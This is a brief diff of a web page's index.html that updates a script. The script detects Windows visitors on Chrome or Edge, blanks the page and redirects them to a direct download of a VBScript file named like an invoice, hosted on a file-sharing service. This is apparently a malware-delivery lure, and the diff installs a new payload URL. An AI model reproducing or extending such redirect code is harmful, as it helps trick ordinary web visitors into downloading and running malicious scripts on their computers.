--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store1.gofile.io/download/direct/e01eb2cb-a373-449f-a9ef-d8d7a3306348/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://store-eu-gra-2.gofile.io/download/direct/56fa173c-2d12-4750-b520-cdec142818bb/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,5 +172,6 @@
 
 
  
+
 
 
